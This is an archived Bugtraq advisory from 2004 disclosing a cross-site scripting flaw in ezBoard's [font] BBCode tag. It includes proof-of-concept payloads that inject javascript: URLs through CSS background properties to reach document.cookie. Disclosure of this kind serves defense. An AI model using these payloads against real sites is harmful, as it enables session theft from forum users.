[<prev] [next>] [day] [month] [year] [list]
Date: 23 Feb 2004 14:09:44 -0000
From: Cheng Peng Su <apple_soup@....com>
To: bugtraq@...urityfocus.com
Subject: ezBoard Cross Site Scripting Vulnerability
########################################################
Advisory Name:ezBoard Cross Site Scripting Vulnerability
Release Date: Feb 24,2004
Application: ezBoard
Version Affected: 7.3u or lower?
Vendor URL: http://www.ezboard.com/
Discover: Cheng Peng Su(apple_soup_at_msn.com)
########################################################
Proof of Concept:
This vuln is from [font],ezBoard doesn't filter illegal characters ,such as ';()
[font color=red;background:url(javascript:{XSS code})]hey[/font] will show
<span style="color:red;background:url(javascript:{XSS code});font-size:small;">hey</span>
and
[font face=Verdana;background:url(javascript:{XSS code})]hey[/font] will show
<span style="font-family:Verdana;background:url(javascript:{XSS code}));font-size:small;">hey</span>
Exploit:
[font color=red;background:url(javascript:alert(document.cookie))]Big Exploit![/font]
[font face=Verdana;background:url(javascript:alert(document.cookie))]Big Exploit![/font]
Contact:
Cheng Peng Su
apple_soup_at_msn.com
Class 1,Senior 2,High school attached to Wuhan University
Wuhan,Hubei,China
Powered by blists - more mailing lists